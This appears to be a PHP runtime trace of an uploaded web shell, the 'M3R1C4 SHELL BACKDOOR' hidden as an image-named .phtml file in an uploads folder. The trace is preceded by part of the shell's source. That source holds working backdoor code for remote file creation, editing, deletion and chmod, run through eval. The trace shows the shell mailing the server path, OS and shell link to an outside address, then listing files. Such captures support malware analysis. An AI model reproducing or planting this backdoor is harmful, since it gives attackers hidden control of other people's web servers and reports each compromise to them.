/>\r\n</form>\';\r\n}\r\n//File baru\r\nelseif($_GET[\'opt\'] == \'baru\'){\r\n\t\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n$new = $_POST[\'newname\'];\r\n$azz = $_POST[\'path\'];\r\n$newz = "$azz/$new";\r\n\r\n\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Create File Done [ \'.$new.\' ]</font><br />\';\r\n}else{\r\necho \'<font color="red">Create File Error</font><br />\';\r\n}\r\nfclose($fp);\r\n}\r\n\r\necho \'<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="\'.$new.\'" /><input type="submit" name="ngaran" value="Create"/></form><br> \';\r\n\r\n$ho = $_POST[\'ngaran1\'];\r\n\r\nif(isset($_POST[\'ngaran\'])){\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($patc)).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$hell.\'/\'.$ho.\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n\t}\r\n\t}\r\n//Edited file\r\nelseif($_GET[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Edit File Done </font><br />\';\r\n}else{\r\necho \'<font color="red">Edit File Error </font><br />\';\r\n}\r\nfclose($fp);\r\n}\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($patc)).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$patc.\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Submit" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br /><center>\';\r\n//Delete dir and file\r\nif(isset($_GET[\'option\']) && $_GET[\'opt\'] == \'delete\'){\r\n\t\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\n//Delete dir\r\nif($_GET[\'type\'] == \'dir\'){\r\n\r\nif(rmdir($patc)){\r\necho \'<font color="green">Delete File Done</font><br />\';\r\n}else{\r\necho \'<font color="red#">Delete File Error </font><br />\';\r\n}\r\n}\r\n//buat folder\r\nif($_GET[\'type\'] == \'buat\'){\r\n$haaa = $_POST[\'path\'];\r\n$heee = $_POST[\'name\'];\r\n$hooo = "$haaa/$heee";\r\n$new = $haaa.\'/\'.htmlspecialchars($heee);\r\nif(!mkdir($new)){\r\necho \'<font color="red">Create Folder Error</font><br />\';\r\n}else{\r\necho \'<font color="green">Create Folder Done </font><br />\';\r\n}\r\n}\r\n//Delete file\r\nelseif($_GET[\'type\'] == \'file\'){\r\n\r\n$hell = $_GET[\'path\'];\r\n$yeah = $_GET[\'name\'];\r\n$patc = "$hell/$yeah";\r\n\r\nif(unlink($patc)){\r\necho \'<font color="green">Delete File Done</font><br />\';\r\n}else{\r\necho \'<font color="red#">Delete File Error </font><br />\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr>\r\n<th class=th_home style="background:silver;color:black;"><center>Name</center></th>\r\n<th class=th_home style="background:silver;color:black;" ><center>Size</center></th>\r\n<th class=th_home style="background:silver;color:black;" ><center>Permission</center></th>\r\n<th class=th_home style="background:silver;color:black;" ><center>Options</center></th>\r\n</tr> <tr>\r\n<td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path=\'.$pa.\'&opt=baru&name=new.php">New File</a> | <a href="?option&path=\'.$pa.\'&opt=btw&type=dir">New Folder</a> </td></tr>\r\n\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "\r\n<tr>\r\n<td class=td_home> <img src=\'data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=\'> <a href=\\"?path=$path/$dir\\">$dir</a></td>\r\n<td class=td_home ><center>DIR</center></td>\r\n<td class=td_home ><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home ><center>\r\n<a href=\\"?option&path=$path&opt=rename&type=dir&name=$dir\\">Rename</a> <a href=\\"?option&path=$path&opt=delete&type=dir&name=$dir\\">Delete</a> <a href=\\"?option&path=$path&opt=chmod&type=dir&name=$dir\\">Chmod</a>\r\n\r\n</center></td>\r\n</tr>";\r\n}\r\necho \'<br>\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "<tr>\r\n<td class=td_home > <img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\'> <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td>\r\n<td class=td_home><center>".$size."</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho "</center></td>\r\n<td class=td_home><center>\r\n<a href=\\"?option&path=$path&opt=edit&type=file&name=$file\\">Edit</a> <a href=\\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\\">Rename</a> <a href=\\"?option&path=$path&opt=delete&type=file&name=$file\\">Delete</a> <a href=\\"?option&path=$path&opt=chmod&type=file&name=$file\\">Chmod</a>\r\n</center></td>\r\n</tr>";\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'<br><center>Copyright © Trenggalek Cyber Army</b></body>\r\n</html>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!' /var/www/html/uploads/img_x.phtml 70 0
3 9 0 0.005812 890592 set_time_limit 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 7 1 0
3 9 1 0.005838 890656
3 9 R FALSE
3 10 0 0.005853 890624 error_reporting 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 8 1 0
3 10 1 0.005868 890664
3 10 R 22527
3 11 0 0.005882 890624 get_magic_quotes_gpc 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 10 0
3 11 1 0.005897 890624
3 11 R FALSE
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 23 $kime = 'aqpunk21@gmail.com'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 24 $baslik = 'Pesanan Shell datang Cuk !'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 25 $spyhackerz = 'Dosya Yolu : /var/www/html\r\n'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 26 $spyhackerz .= 'Server Admin : webmaster@localhost\r\n'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 27 $spyhackerz .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 28 $spyhackerz .= 'Shell Link : http://localhost/uploads/img_x.phtml\r\n'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 29 $spyhackerz .= 'Avlanan Site : localhost\r\n'
3 12 0 0.006015 890848 mail 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 30 3 'aqpunk21@gmail.com' 'Pesanan Shell datang Cuk !' 'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/img_x.phtml\r\nAvlanan Site : localhost\r\n'
3 12 1 0.006733 890944
3 12 R FALSE
3 13 0 0.006757 890848 php_uname 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 73 0
3 13 1 0.006774 890960
3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 14 0 0.006796 890848 getcwd 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 78 0
3 14 1 0.006811 890896
3 14 R '/var/www/html/uploads'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 78 $path = '/var/www/html/uploads'
3 15 0 0.006841 890896 str_replace 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 80 3 '\\' '/' '/var/www/html/uploads'
3 15 1 0.006858 890992
3 15 R '/var/www/html/uploads'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 80 $path = '/var/www/html/uploads'
3 16 0 0.006886 890896 explode 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 81 2 '/' '/var/www/html/uploads'
3 16 1 0.006902 891472
3 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 81 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 0
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 85 $a = TRUE
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 1
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 2
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 3
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 83 $id = 4
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i = 0
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 91 $i++
3 17 0 0.007331 891400 scandir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1432 1 '/var/www/html/uploads'
3 17 1 0.007374 892024
3 17 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'img_x.phtml', 5 => 'prepend.php']
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1432 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'img_x.phtml', 5 => 'prepend.php']
3 18 0 0.007499 891992 getcwd 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1433 0
3 18 1 0.007514 892040
3 18 R '/var/www/html/uploads'
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1433 $pa = '/var/www/html/uploads'
3 19 0 0.007543 892088 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/.'
3 19 1 0.007562 892152
3 19 R TRUE
3 20 0 0.007576 892120 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/..'
3 20 1 0.007593 892168
3 20 R TRUE
3 21 0 0.007607 892128 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/.htaccess'
3 21 1 0.007624 892168
3 21 R FALSE
3 22 0 0.007639 892128 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/data'
3 22 1 0.007655 892168
3 22 R TRUE
3 23 0 0.007670 892128 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1451 1 '/var/www/html/uploads/data'
3 23 1 0.007688 892168
3 23 R TRUE
3 24 0 0.007702 892128 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1453 1 '/var/www/html/uploads/data'
4 25 0 0.007717 892128 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/data'
4 25 1 0.007731 892168
4 25 R 16895
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 16895
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1510 $info = 'd'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= 'x'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= 'x'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= 'x'
3 24 1 0.007868 892168
3 24 R 'drwxrwxrwx'
3 26 0 0.007882 892128 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1454 1 '/var/www/html/uploads/data'
3 26 1 0.007899 892168
3 26 R TRUE
3 27 0 0.007914 892136 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/img_x.phtml'
3 27 1 0.007973 892184
3 27 R FALSE
3 28 0 0.007989 892144 is_dir 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1445 1 '/var/www/html/uploads/prepend.php'
3 28 1 0.008006 892184
3 28 R FALSE
3 29 0 0.008021 892128 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/.'
3 29 1 0.008037 892152
3 29 R FALSE
3 30 0 0.008050 892120 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/..'
3 30 1 0.008066 892168
3 30 R FALSE
3 31 0 0.008079 892128 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.008095 892168
3 31 R TRUE
3 32 0 0.008108 892128 filesize 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 1 '/var/www/html/uploads/.htaccess'
3 32 1 0.008123 892168
3 32 R 64
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 $size = 0.0625
3 33 0 0.008148 892072 round 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 2 0.0625 3
3 33 1 0.008164 892144
3 33 R 0.063
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 $size = 0.063
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1471 $size = '0.063 KB'
3 34 0 0.008203 892168 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1478 1 '/var/www/html/uploads/.htaccess'
3 34 1 0.008221 892208
3 34 R FALSE
3 35 0 0.008234 892168 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1479 1 '/var/www/html/uploads/.htaccess'
3 35 1 0.008255 892208
3 35 R TRUE
3 36 0 0.008268 892168 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1480 1 '/var/www/html/uploads/.htaccess'
4 37 0 0.008283 892168 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/.htaccess'
4 37 1 0.008296 892208
4 37 R 33188
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 33188
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1504 $info = '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= '-'
3 36 1 0.008428 892208
3 36 R '-rw-r--r--'
3 38 0 0.008454 892168 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/.htaccess'
3 38 1 0.008472 892208
3 38 R FALSE
3 39 0 0.008485 892168 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/.htaccess'
3 39 1 0.008501 892208
3 39 R TRUE
3 40 0 0.008515 892168 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/data'
3 40 1 0.008532 892208
3 40 R FALSE
3 41 0 0.008545 892176 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/img_x.phtml'
3 41 1 0.008561 892224
3 41 R TRUE
3 42 0 0.008574 892184 filesize 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 1 '/var/www/html/uploads/img_x.phtml'
3 42 1 0.008587 892224
3 42 R 25240
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 $size = 24.6484375
3 43 0 0.008613 892080 round 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 2 24.6484375 3
3 43 1 0.008627 892152
3 43 R 24.648
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 $size = 24.648
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1471 $size = '24.648 KB'
3 44 0 0.008668 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1478 1 '/var/www/html/uploads/img_x.phtml'
3 44 1 0.008685 892224
3 44 R FALSE
3 45 0 0.008698 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1479 1 '/var/www/html/uploads/img_x.phtml'
3 45 1 0.008714 892224
3 45 R TRUE
3 46 0 0.008727 892184 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1480 1 '/var/www/html/uploads/img_x.phtml'
4 47 0 0.008740 892184 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/img_x.phtml'
4 47 1 0.008754 892224
4 47 R 33204
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 33204
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1504 $info = '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= '-'
3 46 1 0.008885 892224
3 46 R '-rw-rw-r--'
3 48 0 0.008899 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/img_x.phtml'
3 48 1 0.008921 892224
3 48 R FALSE
3 49 0 0.008935 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/img_x.phtml'
3 49 1 0.008951 892224
3 49 R TRUE
3 50 0 0.008965 892184 is_file 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1465 1 '/var/www/html/uploads/prepend.php'
3 50 1 0.008981 892224
3 50 R TRUE
3 51 0 0.008994 892184 filesize 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 1 '/var/www/html/uploads/prepend.php'
3 51 1 0.009009 892224
3 51 R 57
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1466 $size = 0.0556640625
3 52 0 0.009052 892080 round 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 2 0.0556640625 3
3 52 1 0.009067 892152
3 52 R 0.056
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1467 $size = 0.056
2 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1471 $size = '0.056 KB'
3 53 0 0.009108 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1478 1 '/var/www/html/uploads/prepend.php'
3 53 1 0.009125 892224
3 53 R FALSE
3 54 0 0.009138 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1479 1 '/var/www/html/uploads/prepend.php'
3 54 1 0.009154 892224
3 54 R TRUE
3 55 0 0.009167 892184 perms 1 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1480 1 '/var/www/html/uploads/prepend.php'
4 56 0 0.009181 892184 fileperms 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 1 '/var/www/html/uploads/prepend.php'
4 56 1 0.009196 892224
4 56 R 33261
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1494 $perms = 33261
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1504 $info = '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1523 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1524 $info .= 'w'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1527 $info .= 'x'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1530 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1531 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1534 $info .= 'x'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1537 $info .= 'r'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1538 $info .= '-'
3 A /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1541 $info .= 'x'
3 55 1 0.009408 892224
3 55 R '-rwxr-xr-x'
3 57 0 0.009440 892184 is_writable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/prepend.php'
3 57 1 0.009477 892224
3 57 R FALSE
3 58 0 0.009504 892184 is_readable 0 /var/www/html/uploads/img_x.phtml(70) : eval()'d code 1481 1 '/var/www/html/uploads/prepend.php'
3 58 1 0.009534 892224
3 58 R TRUE
2 8 1 0.009579 892120
1 3 1 0.009645 614568
0.009705 525344
TRACE END [2023-02-12 19:35:39.884427]
Generated HTML code
<html><head><script>if(top==window){var layer8NameSpace="layer8ns";"undefined"==typeof window[layer8NameSpace]&&(window[layer8NameSpace]={}),window[layer8NameSpace].layer8Loader=function(){function e(e){return"undefined"!=typeof e&&null!==e}function t(){var t=document.createElement("script");t.setAttribute("src",s),t.setAttribute("id","fn_layer8_script"),t.setAttribute("async",""),(null==document.head||e(document.head))&&(document.head=document.getElementsByTagName("head")[0]),document.head.appendChild(t)}function n(){var t=r();if(e(t)){var n=t;i()&&(n=d(t));var o;try{o=document.documentElement,o.appendChild(n)}catch(c){o=document.body,o.appendChild(n)}a()}}function a(){function e(e){var n=e.data;"l8IframeIsReady"===n.message&&t()}window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onmessage",e)}function r(){var t=document.createElement("iframe");if(e(t)){t.setAttribute("id","fn_layer8"),t.setAttribute("src",u),t.setAttribute("target","_blank"),t.setAttribute("frameborder","0");var n=/firefox/i.exec(navigator.userAgent);e(n)&&n.length>0?(t.style.height=0,t.style.width=0):t.style.display="none",t.frameBorder="no"}return t}function i(){var t=!1,n=/android 